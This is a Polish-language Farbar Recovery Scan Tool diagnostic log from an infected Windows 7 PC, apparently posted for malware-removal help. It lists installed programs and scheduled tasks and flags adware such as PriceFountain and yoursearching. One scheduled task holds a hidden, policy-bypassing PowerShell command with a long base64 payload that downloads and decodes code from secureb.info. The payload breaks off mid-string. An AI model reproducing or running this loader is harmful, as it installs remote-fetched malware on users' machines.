Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja:27-01-2016 Uruchomiony przez Admin (2016-01-28 13:39:05) Uruchomiony z C:\Users\Admin\Desktop Windows 7 Home Premium (X64) (2013-03-29 21:05:46) Tryb startu: Normal ========================================================== ==================== Konta użytkowników: ============================= Admin (S-1-5-21-1157007284-3841837932-3106168173-1000 - Administrator - Enabled) => C:\Users\Admin Administrator (S-1-5-21-1157007284-3841837932-3106168173-500 - Administrator - Disabled) Gość (S-1-5-21-1157007284-3841837932-3106168173-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-1157007284-3841837932-3106168173-1002 - Limited - Enabled) ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) 7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov) Adobe Acrobat Reader DC - Polish (HKLM-x32\...\{AC76BA86-7AD7-1045-7B44-AC0F074E4100}) (Version: 15.010.20056 - Adobe Systems Incorporated) Adobe Flash Player 20 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 20.0.0.286 - Adobe Systems Incorporated) Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.286 - Adobe Systems Incorporated) Adobe Flash Player 20 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 20.0.0.286 - Adobe Systems Incorporated) Ares 2.2.4 (HKLM-x32\...\Ares) (Version: 2.2.4-Build#3048 - Ares Development Group) Atheros Communications Inc.(R) AR81Family Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.0.39 - Atheros Communications Inc.) Atheros Driver Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 9.0 - Atheros) ATI Catalyst Install Manager (HKLM\...\{3605D89A-BD66-F5C5-779B-BE9110B41077}) (Version: 3.0.829.0 - ATI Technologies, Inc.) Broadcom 802.11 Network Adapter (HKLM\...\Broadcom 802.11 Network Adapter) (Version: 5.100.82.63 - Broadcom Corporation) CCleaner (HKLM\...\CCleaner) (Version: 5.03 - Piriform) Cisco EAP-FAST Module (x32 Version: 2.2.14 - Cisco Systems, Inc.) Hidden Cisco LEAP Module (x32 Version: 1.0.19 - Cisco Systems, Inc.) Hidden Cisco PEAP Module (x32 Version: 1.1.6 - Cisco Systems, Inc.) Hidden Conexant HD Audio (HKLM\...\CNXT_AUDIO_HDA) (Version: 8.54.1.55 - Conexant) Dodatek Zapisywanie jako PDF lub XPS firmy Microsoft dla programów pakietu Microsoft Office 2007 (HKLM-x32\...\{90120000-00B2-0415-0000-0000000FF1CE}) (Version: 12.0.4518.1020 - Microsoft Corporation) DriverToolkit version 8.3.5.0 (HKLM-x32\...\{D66BF89F-B0A2-48F5-A2E4-242EB645AB76}_is1) (Version: 8.3.5.0 - Megaify Software) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.111 - Google Inc.) Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden HP Deskjet 2540 series — podstawowe oprogramowanie urządzenia (HKLM\...\{642A855A-F7A6-429C-9818-DF41AE1982BE}) (Version: 32.2.188.47710 - Hewlett-Packard Co.) K-Lite Codec Pack 9.8.0 (Full) (HKLM-x32\...\KLiteCodecPack_is1) (Version: 9.8.0 - ) Launch Manager (HKLM-x32\...\LManager) (Version: 5.1.5 - Acer Inc.) LibreOffice 4.4.3.2 (HKLM-x32\...\{A651A592-2F6C-4D66-AEA8-9BFE4B61BCB3}) (Version: 4.4.3.2 - The Document Foundation) Malwarebytes Anti-Malware wersja 2.0.4.1028 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation) Microsoft .NET Framework 4.5 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50709 - Microsoft Corporation) Microsoft Office Excel Viewer (HKLM-x32\...\{95120000-003F-0409-0000-0000000FF1CE}) (Version: 12.0.6219.1000 - Microsoft Corporation) Microsoft Office Excel Viewer (HKLM-x32\...\{95120000-003F-0415-0000-0000000FF1CE}) (Version: 12.0.6334.5000 - Microsoft Corporation) Microsoft Office Standard Edition 2003 (HKLM-x32\...\{91120415-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation) Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.20125.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Nero 7 Essentials (HKLM-x32\...\{8A8C4EAC-9AB7-45FA-9480-5716FD261045}) (Version: 7.02.4129 - Nero AG) New Total English Elementary ActiveBook (HKLM-x32\...\9781408254943-TENE_ELEM_AB) (Version: - Pearson Education) OpenOffice 4.1.1 (HKLM-x32\...\{B5373BA3-BAD7-4EAC-A9D2-B66B41B82C57}) (Version: 4.11.9775 - Apache Software Foundation) Opera Stable 34.0.2036.50 (HKLM-x32\...\Opera 34.0.2036.50) (Version: 34.0.2036.50 - Opera Software) Polski pakiet językowy dla programu Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile PLK Language Pack) (Version: 4.0.30319 - Microsoft Corporation) PriceFountain (HKU\S-1-5-21-1157007284-3841837932-3106168173-1000\...\PriceFountain) (Version: - ) <==== UWAGA Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7600.30122 - Realtek Semiconductor Corp.) REALTEK Wireless LAN Driver (HKLM-x32\...\{9D3D8C60-A55F-4123-B2B9-173F09590E16}) (Version: 1.00.10.0909 - REALTEK Semiconductor Corp.) Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation) Skype™ 7.17 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.17.105 - Skype Technologies S.A.) Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.1.18.0 - Synaptics Incorporated) System Healer (HKLM-x32\...\SystemHealer) (Version: 4.1.0.0 - SystemHealer) The Westerner (HKLM-x32\...\InstallShield_{243165C5-949A-404D-AE94-A0A2C9CFD44C}) (Version: 1.1 - Cenega) The Westerner (x32 Version: 1.1 - Cenega) Hidden Total Commander PowerPack 2.0 beta (HKLM-x32\...\TC PowerPack 2) (Version: 2.0 beta - bukox.net Adam Bukowiński) Unity Web Player (HKU\S-1-5-21-1157007284-3841837932-3106168173-1000\...\UnityWebPlayer) (Version: - Unity Technologies ApS) Update for PriceFountain (HKU\S-1-5-21-1157007284-3841837932-3106168173-1000\...\Price Fountain) (Version: - Update for PriceFountain) <==== UWAGA yoursearching uninstall (HKLM-x32\...\yoursearching uninstall) (Version: - yoursearching) <==== UWAGA ==================== Niestandardowe rejestracje CLSID (filtrowane): ========================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) ==================== Zaplanowane zadania (filtrowane) ============= (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {0863E0B7-5B86-44CB-BA5C-6483B21A06AB} - System32\Tasks\System HealerPeriod => C:\Program Files (x86)\SystemHealer\SystemHealer.exe [2016-01-18] () Task: {09C7AD51-E7CD-4AF8-BF45-2BD5B8E3C526} - System32\Tasks\SystemHealer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe [2016-01-18] () Task: {1B54F046-9675-42D7-8FC3-2CEA40C3C25A} - System32\Tasks\System HealerStartUp => C:\Program Files (x86)\SystemHealer\SystemHealer.exe [2016-01-18] () Task: {1DEBFF59-3CA1-4396-9BA0-FE04AEAE4A79} - System32\Tasks\Opera scheduled Autoupdate 1425498495 => C:\Program Files (x86)\Opera\launcher.exe [2016-01-18] (Opera Software) Task: {278A9DBA-62D1-4376-9EA7-ED444CD029B4} - System32\Tasks\AdminShipkeeperXenolithsV2 => Rundll32.exe YardingConservatively.dll,main 7 1 <==== UWAGA Task: {3A7FD0B5-4676-49CE-9E70-9ED19B714969} - System32\Tasks\{C25597C8-7C39-4F4A-893C-04C6732440F6} => pcalua.exe -a C:\Users\Admin\AppData\Roaming\yoursearching\UninstallManager.exe -c -ptid=cornl Task: {4DAD2B9C-8F17-49F5-BFD2-0B8BA70FEDF4} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.) Task: {4EA137CC-4CCE-481A-98FB-901677621525} - System32\Tasks\{6C961D7F-9D78-4A55-8AE3-5F5C92C1DFAC} => Firefox.exe hxxp://ui.skype.com/ui/0/6.3.73.105.456/pl/abandoninstall?page=tsProgressBar Task: {4EF62F18-F30D-45EF-BC3E-F00E781761FB} - System32\Tasks\{C4E1EAC5-EBC4-4145-ABC0-4530E24C3F04} => Firefox.exe hxxp://ui.skype.com/ui/0/6.6.0.106/pl/abandoninstall?page=tsPlugin Task: {51396CBF-44E3-4800-B6C9-CF3743E4D18B} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-01-20] (Adobe Systems Incorporated) Task: {561026AD-BBB2-4EB8-B29D-48CA246F0762} - System32\Tasks\{70DA3F7B-9CA4-4C2E-AF83-7643DEB344E4} => pcalua.exe -a E:\westerner\setup.exe -d E:\westerner Task: {5A40E926-9E86-4B89-9CFD-B12311724371} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto Task: {611B9B6D-76FB-4B4B-B548-B153B94D009F} - System32\Tasks\{410AE0AC-A18D-4FE1-ABCD-70E2873239E8} => Firefox.exe hxxp://ui.skype.com/ui/0/6.6.0.106/pl/abandoninstall?page=tsPlugin Task: {6BD344E5-AF20-4C75-BE8C-24A3C6EAD96E} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-14] (Adobe Systems Incorporated) Task: {6C519167-262A-4200-9BBB-ED0FA27AD2DC} - System32\Tasks\{73BE4A54-9082-4DA1-83D9-A314C418D544} => Firefox.exe hxxp://ui.skype.com/ui/0/6.6.73.106.456/pl/abandoninstall?page=tsWLM Task: {9091ECCC-0947-4AB5-97A3-F4F7B63BC278} - System32\Tasks\{0F7F7947-050A-797E-7A11-7A090F79117A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAZQBjAHUAcgBlAGIALgBpAG4AZgBvAC8AdQAvAD8AYQA9ADMAZgB0AGMAWQB5AFYANwAzAHgAcABPAEoAdAAxADkANwBjAFEASQB1AHMAWQBKAGYAbgBBADEAbABjAE8AMgBSAGcAcABpAG4ASgBzAEQAVwBQAGsAQgBBADAARQBrAEsAMwBHAEUAeQBoAEEAYQBrAHIATQBOAF8AMQBLADcAbgBSAGIAWQBoAFMAUQBoAGkAXwBYAHAAbwBjAFIASwBRAEMATABqAFMAdgBxAEEAYwB5ADUAawAzAEQAMgA0AFIAdgB4AHAASwBpAFkASgBmAHoAbwBLADUAVABOAFoAeQBEAEEASQBwAEQATABfAEEAZgBLAEoAcABkAEUAbABUADQAXwBhAFEASgBFAGMAbwB6AEMAQQBJADUAbQBCAGYATABIAEQASABYAFkAcQBwAHMAcQBEAEoAdgByAEoARABHAHUAWABJADUAeABCAHgAawB5AFQANgBjAGIASgAyAGMAaQAwAHUAQQBqADIANwBZAEsALQBZAHkAYwBFADkARwBkAHoARgBHAEoAWABhADMAZABTAGMAQgBGAGIALQA1ADEATwAtAG8ALQBPAFIAdQBwAGEAbgBHAHAAYQBQADIAaABOAG0AcAA5AHoAbQA0AHAAMAA4AEYAeQB4AEEAdwBIAFEAVwBmADcAUgBXAHUANwBRAGkAZwA0ADkAVwBpAG4AWQBLAGkAOAAyAEgAaQBDADMAbwBCAG4AWAAtAFEARQBKAEsAdwBIAHgAMABZADAASQB6AFkAVwBvAEEAagB4AFQATABTAFIAeAB5AFQAQQByAEcAawBoAGMARABGAEgAdgBIAEkAMQBwAEoAdQB3AEQANABGADMAbwBEAEsAeQBtADgATgBkAEkAWgAtAEQATQAwAGMAUwBYADAAMgBiADEALQBkADUAYgAyAG0AaAB0AFQAZwBHAEIARQBoAEYAQgB1AEMAQwBwAEUAWABQAHkAZABpAGcAdwB5AGEAcABZAHgATgB0AEsATAB4AHMAaQBQAHQATABNAHAAcAA0AGoAegBSAFEARABWADQAUwBuAHEAbgBfAEoASABEAGcAMgBmAE0AdgB1AFcARgBNAF8ATgBCADkANAB4AHcARAA2AEEAegAtAEMARQBJAF8ARwBfADAAcAB4ADUAUQBxAGIAUABkAEoAagBHADcATwBZAGsAcQB0AFkAVwBlADcANQBKAHUAVAAzAFEAUQBCADEAawBCAFcAbABVAEMATABIADEAcABpAGoANQBZAFYAVwBlAHAAcQBPAFUAOQA1ADQAeABQAEYAMABCAHMAawBjAEQAbwBQAGIAagBVAGoAeABJADQAZwBGAFYAWgBVAG0AdgBNAFAALQB3AEEAcABiAHcAdgBuAFMATgBGAHIAMwAyAF8AYwAyAEYAcwA1ADMAMwBTAFoAdgA2AFgAQwA3AFMAeABpAHkAUABlAGcAYQBUAFQAQwBTAEYAUABVADMAZQBDAEQAZwBRAHUAWgAwAGYARQBFAC0AUABNADAAOABDADIAVABnAGgAUwB6AC0AaQB5AEsAaABZAEEARgA0AEUAeQA3AHEATwB0AHEAZQA2AEwARAB3ADIATwBuAGkAcgBiADAAdAAyAG8AcwA1AEMAWAB4AF8AcABQAE4AYwBPADkAbwBvADMAdAB0AEgARwBfAEkAaQBhAGYAQQBPAHYAcABaAGkAcwBlAEQAUgB4AFAAeQAyAHUALQA4AEkAXwBtAHMARgAxAEMAMQA2AFcARwBlAFUAQwB0AHQALQBtAGcANgB6AFMAdQBtAGwAcABJAGgARQBGAEwAOQAwAEMAMQB1AHcAWQA5AEUANgBnADUAbgBGAEYANABkAGcAMABVADMAcQBsAFUAbABfAHYAVwBDAHkARgBCAEIAdwBGAGsAQQBWAHcAaAB6AEQASgByADMAMQBNAEQASgAzAEMAcwBVAEoAMwBCAGMAXwBMADEARwBJAFcASgBtAFYAUwBpADUAVABFAGkARgBkAHkAdQBkAHcAMgBzAEMAaAA3AHcALQBMAE4AYQBFAEcANQBvAHMAagBDAEEAeQB5ADUALQBwAG0AdwBhAFYAdwBoAG0AeABBAGUAMQBjAFMANABuADUAcABzAFQAegBfAGEANQBfAEgAaQBoAEkAZgBKADkAcQAxAGYAYQBIAHYAaABaAGEAUQB0AGwAMABJAFQAQQBQAEUAcQBUAGUAbAAtAHcARwBlAHoANQBpADIAdgB5AFUAcgBjAF8AYwAyAGMAdwB4AEEAeQA4AGIAbgAzADIAUgB5AEkAUgBWAEMAbgBGAFoAbQBaAEIAMwAwAHMAcQBWAEUANQB5ADQANwBZAFIANwBqADcAZwA3AFQAZgBNADcAagBRADkAawB5ACYAYwA9AEMAUABaADAASAA1AEkANQBxAFQAcQBuAFEAMgBVADIAZAA0AFEAWQAtAFcARQB5AE8AUQBGAE8AYwBRAHAAegAwAEIAWgBLADYAUgBTAHkAVgBRAEUAYQBSAEEAXwBtAFIARwBZAGUAUgBhAEIAZwBOAC0AZAAwADgAWgB4ADcATwBWAGIAUwB3AEgARwBlADkATABlAEIASgBQADgAVgBIAHcAdQBGAHYANwBtAFYAVgBZAEcAdAB4AHcARQBUAHYAUABnAHEAaQAzAG8AQQBxAEUAdQB2AHEATQBWAHoAVABpAGwANABIAHEAZgBkADYAXwB5ADIASAAxAFMASABiAEIAUwBhADAAWAA2AEcAcQBSAHAAcQBIAG4AeQB4AG8AdgBHAE0AMgBRAE4AOAAxADIAZABrAG8ANQBiAGQAOQBzAFUATABEAGwATQB2ADIAeABkADkAYgBEAFAATQB5AEYAMABFAHgAWABmAHYAVAA1ADQAUgBDAFIARwBEAGUAdABpAEEAVAB2ADIASgBaAGsAeQB5ADEAdAAzAGoAZwB5AHUAZwBRAFQAQQBrADEAYwB6ADcAYQBEAHoAQwBNADcATgAwAHcAXwBUAGkATQByADAANABEADYAUwBpAEMATwBwAHcAMgB5ADIAcwBiAGoAUQBpAHgAdQBfAGgAZAA2AHMAagBfAHoASwBQAHoALQBoAEwAWABKAC0AUAB5AHkAUQA1AEgAawBNAFQALQBXAEMAbgBFAGIAVwBiAFIAcwB2AGYARQBZAEEARABOAGwAMABSAE8AUABxAHQAMwBHADAATQBmAEwAYgA4ADMASQBQAGsAMgBmAGwANwBCAHUATgA0AGYAUgBwAFcAdABVADcAVgBuAHoAXwA2AFIATgBKAHEAagBiAFAAQQBfAGIAZABHAHoAcQBVADIAagBSAHkAQwBhAGkAMABzAHMAQgBCAGcAUAAxAHEAQQBRAEkAOQBEAHoAcABWAE4AbQB3AEMAUgBEAG0AcQBrADcAbABEADMAeABqAFAAMgBwAFoAVgB6AFoAOABmAEkALQBRAHkAVQBFAGoARgBSAEkATwBvAE0ARwBrAEQAUQA2AEcAVQBOAFoATQBZAEoAWQBrADYAdABUAC0AUwAzAGcATgAwADIAWABLAFYANwA3AE4AeQB0AFkAbgBwAHEANwA5AG8ANwAzAF8AVQAyAHMAbQBvAE4AcQBsAGoASwBaAF8AawB1AG4AVABMAG0AbwB1AFQAYgA4AFQASQA5AEcAMgBPAEQAUQBjAEgARQBMAFEATgBjAE0AYQB6AGcAMQBpAEgAUAB6AGIAMABIAEMAOABqAGwAQgA3AG8AMwBUAGEAWgBfAGYAdQBJAF8AUwBrAFYAQgBoADEAdgBXADUAQgBUAG8AdgBvAFIALQBtAEIAcwBKAGoAOQBMAGQAegBEADIATABuAEEALQBiADcAagB2ADcAagBTAGgAQQBzAHcAUgBkAEUAUwBMAHEAaQBJAEoAMwBHAEwAQwBrAGgAcQBsAFYAZABQAEMAegBEAEUAVQAwAGwASwBRAHcAYwBpAFcARwBPAHIALQBhAGUANwAxAHcAUQBWAC0AbgBGAGsANgB3AFoAZQA4AEcAUQA5AFQATQBkAEQAawBtAEcATQBEAHUAcgBtAGIAQwBoADgAaABwAC0ARQB3AEgALQBXAEsARQBIAG4AdQBkAHUAcwB5ADEAcwBEAFYAcABPAGkAbwBGAHEAZQBlADEAXwA5AGgATwBMAGUANgB6AHUANQBuAC0AXwAzAHEAMgB5AGwAUgBDAFUAUAB2AHcAbABnAFUAVgAwAEQARwA0AGcARgBBAEsAcABjAEUANQAzAHYAUQA2AEMAcwBRADAARQBNADkARABUADgAdQBuAHcANABaAHEAZwA5ADQAaABnADUAcABqAGYAawBuAEcAVABRAEcAZQBwAHAAVgBlAEoAWQBoAEcAcwBoAGMAVwB6AHQAeQBXAFMAYgBHADIASwB3AFUAYgB5AHEAMgBJAGwARQA0AFUALQBIAG0AQgAwAEIAMAB0ADUAWQBnAGoAQwBkAHIAawBYAGgARABsAHkAUAB0AFgAcQBkAGcATgBzAGUANgBZAGwATABvAHkAbgAxAHoAQwBkAEcAaQBFAGsAbABsADEAcABfAEUAbgBjAHAAcgB1AFEANwBkAGwAOABRAHkATwAtAG8AbwBLAGcAegBXAGUAOABRADUAeABwAEEAMgB3AE0ASgBLAFQASwBYAGIAYwBjAGEAQQBEAG8ASgBjAFMAWgBIAGQAcgBsAGgAQgBQAEIAeAA0AF8AdgByAEIANABBAFUANwAxAHEAbgBBAEwAdQBiAEMAcgB5AFoAQgBvAEYAUQBmAHQAZwBkADEALQBXAGMAWAByAGsAWQBfACYAcgA9ADEANwA1ADMAMwA2ADYAMwA3ADUANwAwADkAOQA5ADYAMwAwADcAIgA7ACQAcwB0AHMAawA9ACIAewAwAEYANwBGADcAOQA0ADcALQAwADUAMABBAC0ANwA5ADcARQAtADcAQQAxADEALQA3AEEAMAA5ADAARgA3ADkAMQAxADcAQQB9ACIAOwAkAHAAcgBpAGQAPQAiAFMAeQBzAHQAZQBtAEgAZQBhAGwAZQByACIAOwAkAGkAbgBpAGQAPQAiAFEAMwA0AFYAMwBVAFUAUQAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwB9ACQAdgA9AFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuADsACgBpAGYAKAAkAHYALgBNAGEAagBvAHIAIAAtAGUAcQAgADUAKQB7AGkAZgAoACgAJAB2AC4ATQBpAG4AbwByACAALQBsAHQAIAAyACkAIAAtAEEATgBEACAAKAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AUwBlAHIAdgBpAGMAZQBQAGEAYwBrAE0AYQBqAG8AcgBWAGUAcgBzAGkAbwBuACAALQBsAHQAIAAyACkAKQB7AGIAcgBlAGEAawA7AH0AfQAKAGkAZgAoAC0ATgBPAFQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAgACIAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgAiACkAKQB7AGIAcgBlAGEAawA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIAB3AGMAKAAkAHUAcgBsACkAewAkAHIAcQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHIAcQAuAFUAcwBlAEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzAD0AJAB0AHIAdQBlADsAJAByAHEALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAHUAcwBlAHIALQBhAGcAZQBuAHQAIgAsACIATQBvAHoAaQBsAGwAYQAvADQALgAwACAAKABjAG8AbQBwAGEAdABpAGIAbABlADsAIABNAFMASQBFACAANwAuADAAOwAgAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACkAIgApADsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAcgBxAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHUAcgBsACkAKQA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIABkAHMAdAByACgAJAByAGEAdwBkAGEAdABhACkAewAkAGIAdAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAByAGEAdwBkAGEAdABhACkAOwAkAGUAeAB0AD0AJABiAHQAWwAwAF0AOwAkAGsAZQB5AD0AJABiAHQAWwAxAF0AIAAtAGIAeABvAHIAIAAxADcAMAA7AGYAbwByACgAJABpAD0AMgA7ACQAaQAgAC0AbAB0ACAAJABiAHQALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAYgB0AFsAJABpAF0APQAoACQAYgB0AFsAJABpAF0AIAAtAGIAeABvAHIAIAAoACgAJABrAGUAeQAgACsAIAAkAGkAKQAgAC0AYgBhAG4AZAAgADIANQA1ACkAKQA7AH0ACgByAGUAdAB1AHIAbgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgB